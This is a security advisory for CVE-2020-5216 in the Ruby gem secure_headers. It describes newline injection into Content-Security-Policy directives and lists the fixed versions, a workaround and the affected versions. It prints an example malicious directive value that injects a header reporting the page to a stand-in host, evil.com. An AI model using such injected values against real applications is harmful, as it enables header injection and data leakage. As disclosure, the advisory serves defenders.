GHSA-w978-rmpf-qmwg

Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/01/GHSA-w978-rmpf-qmwg/GHSA-w978-rmpf-qmwg.json

Aliases

CVE-2020-5216

Published

2020-01-23T02:27:53Z

Modified

2023-05-16T16:45:53.615930Z

Details

Impact

If user-supplied input was passed into append/overridecontentsecuritypolicydirectives, a newline could be injected leading to limited header injection.

Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy header with the remaining value of the original string. It will continue to create new headers for each newline.

e.g.

override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])`

would result in

Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: injected
Content-Security-Policy: rest-of-the-header

CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:

override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"])

Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: default-src 'none'; report-uri evil.com
Content-Security-Policy: rest-of-the-header

Patches

This has been fixed in 6.3.0, 5.2.0, and 3.9.0

Workarounds

override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")])

References

https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c The effect of multiple policies

For more information

If you have any questions or comments about this advisory: * Open an issue in this repo * DM us at @ndm on twitter

References

Affected packages

RubyGems / secure_headers

secure_headers

Affected ranges

Type: ECOSYSTEM
Events: Introduced

6.0.0

Fixed

6.3.0

Affected versions

6.*

6.0.0

6.1.0

6.1.1

6.1.2

6.2.0

RubyGems / secure_headers

secure_headers

Affected ranges

Type: ECOSYSTEM
Events: Introduced

5.0.0

Fixed

5.2.0

Affected versions

5.*

5.0.1

5.0.2

5.0.3

5.0.4

5.0.5

5.1.0

RubyGems / secure_headers

secure_headers

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0

Fixed

3.9.0

Affected versions

0.*

0.1.0

0.1.1

0.2.0

0.2.1

0.3.0

0.4.0

0.4.1

0.4.2

0.4.3

0.5.0

1.*

1.0.0

1.1.0

1.1.1

1.2.0

1.3.0

1.3.1

1.3.2

1.3.3

1.3.4

1.4.0

1.4.1

2.*

2.0.0

2.0.0.pre

2.0.0.pre2

2.0.1

2.0.2

2.1.0

2.2.0

2.2.1

2.2.2

2.2.3

2.2.4

2.3.0

2.4.0

2.4.1

2.4.2

2.4.3

2.4.4

2.5.0

2.5.1

2.5.2

2.5.3

3.*

3.0.0

3.0.0.pre

3.0.0.pre1

3.0.0.pre2

3.0.0.pre3

3.0.0.rc1

3.0.1

3.0.2

3.0.3

3.1.0

3.1.1

3.1.2

3.2.0

3.3.0

3.3.1

3.3.2

3.4.0

3.4.1

3.5.0

3.5.0.pre

3.5.1

3.6.0

3.6.1

3.6.2

3.6.3

3.6.4

3.6.5

3.6.6

3.6.7

3.7.0

3.7.1

3.7.2

3.7.3

3.7.4

3.8.0